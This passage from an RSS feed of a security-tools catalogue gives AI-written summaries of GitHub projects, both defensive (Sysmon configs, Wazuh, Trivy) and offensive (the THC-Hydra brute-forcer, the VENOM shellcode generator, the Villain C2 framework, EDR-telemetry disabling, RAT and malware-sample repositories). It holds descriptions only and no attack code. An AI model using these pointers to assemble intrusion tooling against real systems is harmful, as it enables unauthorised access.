&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; sysmon-modular is a modular Sysmon configuration repository designed for customization and maintenance of Microsoft Sysinternals&amp;rsquo; Sysmon tool. Its primary use case is to generate tailored event logging configurations for monitoring system behavior and enhancing threat detection in diverse environments. Notable features include pre-generated configurations catering to different verbosity levels, a flexible module system for incorporating custom configurations, and automated XML generation through a PowerShell script integrated with Azure Pipelines.&lt;/p&gt;</description></item><item><title>Tata-Sky-IPTV</title><link>https://rainmana.github.io/hackyfeed/tools/forcegt-tata-sky-iptv/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/forcegt-tata-sky-iptv/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Tata Sky/Play IPTV Script generator is a tool that creates an m3u playlist containing direct streamable files, specifically designed for users with a Tata Sky subscription. It offers both an easy-to-use app and a command-line script for generating the playlist, with features like automatic login credential storage and expiration notifications for the generated playlist. This tool is primarily aimed at facilitating seamless access to subscribed channels through compatible IPTV applications.&lt;/p&gt;</description></item><item><title>TelemetrySourcerer</title><link>https://rainmana.github.io/hackyfeed/tools/jthuraisamy-telemetrysourcerer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jthuraisamy-telemetrysourcerer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Telemetry Sourcerer is a tool designed for red teamers and security researchers to enumerate and disable various sources of telemetry utilized by antivirus and endpoint detection and response (EDR) systems on Windows. It features the ability to suppress kernel-mode callbacks, unhook inline user-mode hooks, and identify relevant Event Tracing for Windows (ETW) sessions, making it instrumental in identifying blind spots and validating evasion techniques within lab environments. However, it is primarily for research applications and carries OPSEC risks if deployed in production settings.&lt;/p&gt;</description></item><item><title>Template</title><link>https://rainmana.github.io/hackyfeed/tools/1n7erface-template/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n7erface-template/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Template is a heuristic internal network scanning tool designed for security assessments and vulnerability detection. It features a producer-consumer model for efficient data handling, employs heuristic scanning methods to minimize packet sending, and includes robust web fingerprinting capabilities with over 900 fingerprints. Additionally, it supports extreme concurrency in its modules, optimizing performance during scans and brute force attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="template---启发式内网扫描"&gt;Template - 启发式内网扫描&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/github/stars/1n7erface/Template?color=success" alt="GitHub Repo stars"&gt;
&lt;img src="https://img.shields.io/github/forks/1n7erface/Template" alt="GitHub forks"&gt;
&lt;img src="https://img.shields.io/github/downloads/1n7erface/Template/total?color=blueviolet" alt="GitHub all release"&gt;
&lt;img src="https://img.shields.io/badge/KCon-%E5%85%B5%E5%99%A8%E8%B0%B1-red" alt=""&gt;&lt;/p&gt;</description></item><item><title>terracognita</title><link>https://rainmana.github.io/hackyfeed/tools/cycloidio-terracognita/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cycloidio-terracognita/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Terracognita is a tool that automates the import of existing cloud infrastructure into Terraform configurations (HCL) or Terraform state, particularly supporting AWS, GCP, Azure, and VMware. It streamlines the adoption of Infrastructure as Code (IaC) best practices by generating Terraform code from current cloud setups, enabling easier lifecycle management and integration with Cycloid&amp;rsquo;s DevOps pipelines. Notable features include support for multiple major cloud providers and an open-source nature that encourages community contributions.&lt;/p&gt;</description></item><item><title>terraform-aws-secure-baseline</title><link>https://rainmana.github.io/hackyfeed/tools/nozaq-terraform-aws-secure-baseline/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nozaq-terraform-aws-secure-baseline/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The terraform-aws-secure-baseline module automates the establishment of a secure configuration baseline for AWS accounts, adhering to recognized security benchmarks such as CIS AWS Foundations and AWS Foundational Security Best Practices. Key features include enhanced Identity and Access Management through IAM policies and roles, comprehensive logging and monitoring via AWS CloudTrail and CloudWatch, and secure networking configurations that limit exposure and enforce best practices. This module is integral for organizations seeking to enhance their security posture in AWS by simplifying compliance with security standards.&lt;/p&gt;</description></item><item><title>THC-Archive</title><link>https://rainmana.github.io/hackyfeed/tools/hackerschoice-thc-archive/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackerschoice-thc-archive/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; THC-Archive is a repository that consolidates all releases from The Hacker&amp;rsquo;s Choice, a prominent security research group. This collection serves as a backup for their work, ensuring that projects are preserved despite the lack of a full web server. Notable active projects include THC-Hydra, THC-IPv6, and utilities aimed at various hacking and security tasks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="thc-archive"&gt;THC-Archive&lt;/h1&gt;
&lt;p&gt;All releases of the security research group (a.k.a. hackers) The Hacker&amp;rsquo;s Choice&lt;/p&gt;</description></item><item><title>thc-hydra</title><link>https://rainmana.github.io/hackyfeed/tools/vanhauser-thc-thc-hydra/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vanhauser-thc-thc-hydra/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; THC-Hydra is a versatile password-cracking tool designed for testing the security of various network services by attempting to gain unauthorized access through brute-force attacks. It supports multiple protocols, including FTP, HTTP, SSH, and many others, enabling security researchers and consultants to evaluate password strength and recognize vulnerabilities across a wide range of applications. Notable features include its ability to conduct parallelized connection attempts and an extensible module engine for easy addition of new protocols.&lt;/p&gt;</description></item><item><title>theHarvester</title><link>https://rainmana.github.io/hackyfeed/tools/laramies-theharvester/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/laramies-theharvester/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; theHarvester is a reconnaissance tool designed for red team assessments and penetration tests, facilitating the gathering of open-source intelligence (OSINT). It collects various types of data such as names, emails, IP addresses, subdomains, and URLs from multiple public sources, enhancing a security professional&amp;rsquo;s understanding of a domain&amp;rsquo;s external threat landscape. Notable features include support for numerous passive modules that query different search engines and databases, enabling comprehensive domain analysis and threat enumeration.&lt;/p&gt;</description></item><item><title>theZoo</title><link>https://rainmana.github.io/hackyfeed/tools/ytisf-thezoo/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ytisf-thezoo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; theZoo is a live malware repository designed to facilitate malware analysis by providing a comprehensive collection of malware samples and source code for educational and research purposes. It enables users to safely analyze malware behavior in isolated environments, with guidance on precautions for running potentially dangerous samples. Notable features include a user-friendly setup through a Python-based command-line interface and organized access to various malware types for in-depth research.&lt;/p&gt;</description></item><item><title>thorium</title><link>https://rainmana.github.io/hackyfeed/tools/cisagov-thorium/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cisagov-thorium/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Thorium is a scalable file analysis and data generation platform designed to orchestrate various docker, VM, or shell tools at scale. Its primary use case is to facilitate the analysis of arbitrary files and repositories, while featuring easy tool import capabilities, static and dynamic analysis sandboxes, a RESTful API, and multi-tenant support for permission management. Additionally, Thorium supports comprehensive search functionalities and includes a wide array of pre-integrated analysis tools, making it suitable for both individual developers and collaborative analytics environments.&lt;/p&gt;</description></item><item><title>TIDoS-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/0xinfection-tidos-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xinfection-tidos-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TIDoS is an advanced offensive web application penetration testing framework designed to facilitate comprehensive security assessments by automating tasks across multiple phases, including reconnaissance, scanning, and vulnerability analysis. With over 100 modules and features such as multiprocessing for performance enhancement, a Metasploit-like console interface, and a graphical user interface, TIDoS streamlines the penetration testing process, enabling users to conduct efficient and thorough web application security assessments with minimal configuration. Additional capabilities like Tor integration further enhance anonymity during testing efforts.&lt;/p&gt;</description></item><item><title>tiny_tracer</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-tiny_tracer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-tiny_tracer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Tiny Tracer is a binary instrumentation tool designed for tracing API calls, defined local functions, selected instructions, and inline system calls, while also evading various anti-debug and anti-VM techniques. It generates detailed reports in a .tag format, which can be utilized by other analysis tools, facilitating deeper insights into a program&amp;rsquo;s execution flow. The tool is primarily aimed at security researchers and analysts who need to examine malicious binaries or analyze software behavior in a controlled environment.&lt;/p&gt;</description></item><item><title>toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/indetectables-net-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/indetectables-net-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Indetectables Toolkit is a comprehensive suite designed for malware analysts and cybersecurity professionals, offering a wide range of 101 tools for various tasks. Key features include automated updates via a Universal Updater, easy extensibility for adding new tools, and integration with Windows context menus for enhanced usability. The toolkit aims to streamline the workflow for both novice and experienced users while providing reliable and curated resources for cybersecurity operations.&lt;/p&gt;</description></item><item><title>trivy-operator</title><link>https://rainmana.github.io/hackyfeed/tools/aquasecurity-trivy-operator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aquasecurity-trivy-operator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Trivy Operator is a Kubernetes-native security toolkit that utilizes Trivy to perform continuous security scans of Kubernetes clusters. It automatically generates and updates comprehensive security reports, including vulnerability assessments, configuration audits, and compliance checks, which are accessible through the Kubernetes API. Notable features include automated scans for workloads, RBAC assessments, secret exposure detection, and generation of Software Bill of Materials (SBOM) for workloads, aiding in the identification and mitigation of potential security risks in real-time.&lt;/p&gt;</description></item><item><title>TryHackMe-Roadmap</title><link>https://rainmana.github.io/hackyfeed/tools/rng70-tryhackme-roadmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rng70-tryhackme-roadmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The TryHackMe Road Map repository provides a comprehensive list of over 350 free TryHackMe rooms categorized by various cybersecurity topics to facilitate learning and practice in ethical hacking. Its primary use case is to help individuals, from beginners to advanced users, streamline their training by accessing a structured pathway through challenges in areas such as Linux fundamentals, web security, and more. Notable features include the organization of topics for a sequential learning approach and the inclusion of various practical scenarios to enhance hands-on experience in cybersecurity.&lt;/p&gt;</description></item><item><title>Ukraine-Cyber-Operations</title><link>https://rainmana.github.io/hackyfeed/tools/curated-intel-ukraine-cyber-operations/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/curated-intel-ukraine-cyber-operations/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ukraine Cyber Operations repository provides curated threat intelligence resources specifically tailored for organizations in Ukraine, focusing on the ongoing cyber operations related to the Russia-Ukraine conflict. Notable features include a comprehensive timeline of monthly threat reports from 2022 and 2023, contextualized indicators of compromise (IOCs) contributed by the Equinix Threat Analysis Center, and vetted open-source intelligence (OSINT) sources, enhancing the situational awareness and response capabilities of users.&lt;/p&gt;</description></item><item><title>Ultimate-RAT-Collection</title><link>https://rainmana.github.io/hackyfeed/tools/cryakl-ultimate-rat-collection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cryakl-ultimate-rat-collection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ultimate RAT Collection functions as a repository of Remote Access Trojan (RAT) samples and builders, primarily used for cybersecurity research, analysis, and reverse engineering. It emphasizes caution by advising users to conduct their analysis within secure environments like virtual machines or sandboxes to prevent contamination of critical systems. Notable features include a collection of genuine malware samples and a community-driven approach to include new samples through pull requests.&lt;/p&gt;</description></item><item><title>unlicense</title><link>https://rainmana.github.io/hackyfeed/tools/ergrelet-unlicense/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ergrelet-unlicense/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Unlicense is a Python 3 tool designed to dynamically unpack executables protected by Themida and WinLicense versions 2.x and 3.x, accommodating both 32-bit and 64-bit portable executables (PEs) and .NET assemblies. Its notable features include automatic recovery of the original entry point (OEP) and obfuscated import tables, although it requires a valid license file for certain WinLicense-protected executables and may produce non-runnable dumps. Users can interact with the tool via a command-line interface or a drag-and-drop executable option for ease of use.&lt;/p&gt;</description></item><item><title>user-scanner</title><link>https://rainmana.github.io/hackyfeed/tools/kaifcodec-user-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kaifcodec-user-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; User Scanner is an advanced email and username OSINT tool designed to verify the registration status of emails and the availability of usernames across multiple platforms, including GitHub, X (formerly Twitter), Reddit, and Instagram. It features dual-mode usage for email and username scanning, supports bulk scanning, utilizes wildcard-based username permutations, and provides clear output formats such as JSON and CSV, along with proxy support for enhanced anonymity. The tool&amp;rsquo;s modular architecture allows for easy integration of new platforms, making it a versatile choice for security professionals and branding efforts.&lt;/p&gt;</description></item><item><title>username-anarchy</title><link>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-username-anarchy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-username-anarchy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Username Anarchy is a command-line tool designed for generating potential usernames during penetration testing, crucial for user account/password brute force attacks and username enumeration. It features a flexible plugin architecture for various username formats, utilizes common first and last names databases from external sources, and allows for name substitutions to maximize coverage when only partial user information is known. This tool supports input from multiple formats and automates name generation based on country datasets or popular social media aliases.&lt;/p&gt;</description></item><item><title>venom</title><link>https://rainmana.github.io/hackyfeed/tools/r00t-3xp10it-venom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r00t-3xp10it-venom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VENOM is a metasploit shellcode generator and compiler that enables users to create and inject shellcode payloads in various formats such as C#, Python, Ruby, and executable formats like ELF and APK. Its primary use case lies in Red Team operations, where it assists in payload delivery through a web server and leverages automation to handle dependencies and remote connections seamlessly. Notable features include support for multiple scripting languages, integration with compilers for building executables, and functionalities similar to other popular evasion tools.&lt;/p&gt;</description></item><item><title>Venom</title><link>https://rainmana.github.io/hackyfeed/tools/dliv3-venom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dliv3-venom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Venom is a multi-hop proxy tool designed for penetration testers, built using Go, which allows the connection of multiple nodes to facilitate multi-layer traffic routing. Key features include a visual network topology, multi-level SOCKS5 proxying, interactive shell access, and secure communication between nodes, making it ideal for managing complex internal networks during security assessments. The tool supports various platforms and architectures, enhancing its versatility for engagements in diverse environments.&lt;/p&gt;</description></item><item><title>VHostScan</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-vhostscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-vhostscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VHostScan is a virtual host scanner designed to enhance the discovery of virtual hosts and identify catch-all scenarios, aliases, and dynamic default pages. This tool is particularly useful for penetration testers and security professionals, as it features a modernized codebase, improved wordlists for various environments, robust error handling, and performance optimizations. Notable capabilities include support for both HTTP and HTTPS, customizable wordlist inputs, and the ability to identify new targets through reverse lookups.&lt;/p&gt;</description></item><item><title>Villain</title><link>https://rainmana.github.io/hackyfeed/tools/t3l3machus-villain/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/t3l3machus-villain/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Villain is a high-level C2 framework designed for managing multiple reverse TCP and HoaxShell-based shells, allowing users to enhance shell functionality and share features across different instances. Notable features include customizable payload generation, a dynamic pseudo-shell prompt for session management, file upload capabilities, fileless script execution, and a built-in Session Defender to prevent user errors during command input. The tool is primarily aimed at ethical hacking and penetration testing, ensuring users operate within legal boundaries.&lt;/p&gt;</description></item><item><title>ViperMonkey</title><link>https://rainmana.github.io/hackyfeed/tools/decalage2-vipermonkey/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/decalage2-vipermonkey/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ViperMonkey is a Python-based VBA emulation engine specifically designed for the analysis and deobfuscation of malicious VBA macros found in Microsoft Office files. Its primary use case is aiding cybersecurity professionals in identifying and understanding obfuscated malware by executing VBA scripts in a controlled environment. Notable features include its integration with Docker for ease of installation and enhanced performance when utilizing PyPy, although it also operates with traditional Python interpreters.&lt;/p&gt;</description></item><item><title>vps-audit</title><link>https://rainmana.github.io/hackyfeed/tools/vernu-vps-audit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vernu-vps-audit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The VPS Security Audit Script is a comprehensive Bash tool designed for auditing the security and performance of Debian/Ubuntu-based virtual private servers. It performs extensive security checks, including SSH configuration, firewall status, and system update status, while also monitoring resource usage such as disk space and CPU. The script not only provides real-time color-coded feedback during execution but also generates a detailed report with improvement recommendations based on the audit findings.&lt;/p&gt;</description></item><item><title>vulscan</title><link>https://rainmana.github.io/hackyfeed/tools/scipag-vulscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/scipag-vulscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Vulscan is a powerful Nmap module that transforms the commonly used network scanning tool into an effective vulnerability scanner by leveraging version detection to identify potential flaws in services. It utilizes various pre-defined vulnerability databases such as VulDB and CVE, with the capability of supporting custom databases for enhanced flexibility. Notable features include automatic updates for vulnerability databases and configurable settings to optimize match priority and version detection.&lt;/p&gt;</description></item><item><title>WADComs.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/wadcoms-wadcoms.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wadcoms-wadcoms.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WADComs is an interactive cheat sheet designed for offensive security professionals, offering a curated list of tools and their commands specifically for targeting Windows and Active Directory environments. Its primary use case is to aid security experts in executing effective penetration testing by providing quick access to essential commands. Notable features include its comprehensive tool listings and command syntaxes, all consolidated in a web-based format for ease of use.&lt;/p&gt;</description></item><item><title>wazuh</title><link>https://rainmana.github.io/hackyfeed/tools/wazuh-wazuh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wazuh-wazuh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Wazuh is an open-source security platform designed for threat prevention, detection, and response across various environments, including on-premises, virtualized, containerized, and cloud settings. It features an endpoint security agent that collects data for analysis by a centralized management server, fully integrated with the Elastic Stack for enhanced search and visualization of security alerts. Key capabilities include intrusion detection, log data analysis, file integrity monitoring, vulnerability detection, configuration assessment, and automated incident response, making it a comprehensive tool for maintaining security compliance and mitigating threats.&lt;/p&gt;</description></item><item><title>Web_Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/mehdi0x90-web_hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mehdi0x90-web_hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web Hacking is a comprehensive repository of notes focused on bug bounty hunting and penetration testing, collating various techniques for vulnerability discovery and exploitation. The tool features extensive reconnaissance and OSINT methods, a detailed list of common vulnerabilities, and bypass techniques, making it a valuable resource for security professionals seeking to enhance their skills and methodologies in web application security. Additionally, it encourages community contributions, fostering continuous improvement and updates of its content.&lt;/p&gt;</description></item><item><title>Web-App-Pentest-Checklist</title><link>https://rainmana.github.io/hackyfeed/tools/hari-prasaanth-web-app-pentest-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hari-prasaanth-web-app-pentest-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Web App Pentest Checklist&amp;rdquo; is a comprehensive OWASP-based tool designed for web application security assessments, featuring over 500 test cases across various categories such as information gathering, configuration management, and vulnerability testing. Its extensive coverage includes methods for reconnaissance, fingerprinting technologies, and testing for security misconfigurations and common vulnerabilities, making it an essential resource for penetration testers. Notable features include detailed checklists for enumerating applications, verifying configurations, and ensuring compliance with security best practices.&lt;/p&gt;</description></item><item><title>Web-Cache-Vulnerability-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/hackmanit-web-cache-vulnerability-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackmanit-web-cache-vulnerability-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web Cache Vulnerability Scanner (WCVS) is a command-line interface tool designed to identify and exploit web cache poisoning and deception vulnerabilities across various web applications. It supports multiple techniques for both attack types, features a crawler for discovering additional URLs, and can be integrated into CI/CD processes to streamline security practices. Notable functionalities include customizable request handling, JSON report generation, and the ability to route traffic through a proxy for enhanced testing versatility.&lt;/p&gt;</description></item><item><title>Web-Fuzzing-Box</title><link>https://rainmana.github.io/hackyfeed/tools/gh0stkey-web-fuzzing-box/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh0stkey-web-fuzzing-box/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web-Fuzzing-Box is a tool designed for web application security testing, offering a diverse collection of dictionaries and payloads for conducting fuzzing attacks, including brute force, directory and file enumeration, and exploitation of web vulnerabilities. Notable features include a comprehensive suite of dictionaries tailored for specific vulnerabilities such as SQL injection, XSS, and authentication bypass, as well as case studies demonstrating the practical application of these resources in real-world scenarios. This tool is particularly valuable for penetration testers and security researchers seeking to enhance their web application assessments.&lt;/p&gt;</description></item><item><title>webanalyze</title><link>https://rainmana.github.io/hackyfeed/tools/rverton-webanalyze/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rverton-webanalyze/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Webanalyze is a performance-oriented tool written in Go that identifies technologies used by web applications by analyzing HTTP responses from specified hosts. Its primary use case is for security assessments and technology profiling, supporting bulk analysis of multiple hosts via input files and offering output in various formats such as CSV and JSON. Notable features include the ability to crawl links from a root page, search for subdomains, and download updated app definitions from the Wappalyzer repository.&lt;/p&gt;</description></item><item><title>webcopilot</title><link>https://rainmana.github.io/hackyfeed/tools/h4r5h1t-webcopilot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/h4r5h1t-webcopilot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WebCopilot is an automation tool for security assessments that enumerates subdomains of a target domain and scans for vulnerabilities such as XSS, SQLi, and RCE. It employs various open-source tools for subdomain enumeration, active scanning, endpoint crawling, and filtering of vulnerability parameters, ultimately presenting the results in a structured manner. Notable features include comprehensive subdomain enumeration, endpoint crawling, and integration with multiple vulnerability scanning tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;&lt;a href="https://github.com/h4r5h1t/webcopilot/"&gt;WebCopilot&lt;/a&gt;&lt;/h1&gt;
&lt;h4 align="center"&gt;An automation tool that enumerate subdomains then filters out xss, sqli, open redirect, lfi, ssrf and rce parameters and then scans for vulnerabilities.&lt;/h4&gt;
&lt;p align="center"&gt;
&lt;a href="https://twitter.com/h4r5h1t_hrs"&gt;&lt;img src="https://img.shields.io/twitter/follow/h4r5h1t_hrs?style=social"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t?tab=followers"&gt;&lt;img src="https://img.shields.io/github/followers/h4r5h1t?style=social"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t/webcopilot/issues"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t/webcopilot/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg"&gt;&lt;/a&gt;
&lt;a href="#"&gt;&lt;img src="https://img.shields.io/badge/Made%20with-Bash-1f425f.svg"&gt;&lt;/a&gt;
&lt;a href="#"&gt;&lt;img src="https://madewithlove.org.in/badge.svg"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>webkiller</title><link>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-webkiller/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-webkiller/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WebKiller V2 is a Python-based tool designed for information gathering and CMS detection in web applications. Its primary use case is to aid cybersecurity professionals in identifying vulnerabilities and obtaining crucial data about target websites. Notable features include a user-friendly command-line interface, compatibility with multiple operating systems, and comprehensive installation instructions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://www.python.org/download/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.5-yellow.svg" alt="Python 3.5"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="webkiller-v2"&gt;WebKiller V2&lt;/h1&gt;
&lt;p&gt;Tool Information Gathering Write With Python.&lt;/p&gt;
&lt;h2 id="preview"&gt;PreView&lt;/h2&gt;
&lt;pre&gt;

 
 ██╗ ██╗███████╗██████╗ ██╗ ██╗██╗██╗ ██╗ ███████╗██████╗ 
 ██║ ██║██╔════╝██╔══██╗██║ ██╔╝██║██║ ██║ ██╔════╝██╔══██╗
 ██║ █╗ ██║█████╗ ██████╔╝█████╔╝ ██║██║ ██║ █████╗ ██████╔╝
 ██║███╗██║██╔══╝ ██╔══██╗██╔═██╗ ██║██║ ██║ ██╔══╝ ██╔══██╗
 ╚███╔███╔╝███████╗██████╔╝██║ ██╗██║███████╗███████╗███████╗██║ ██║
 ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
 ====================================================================
 ** WebSite : UltraSec.org **
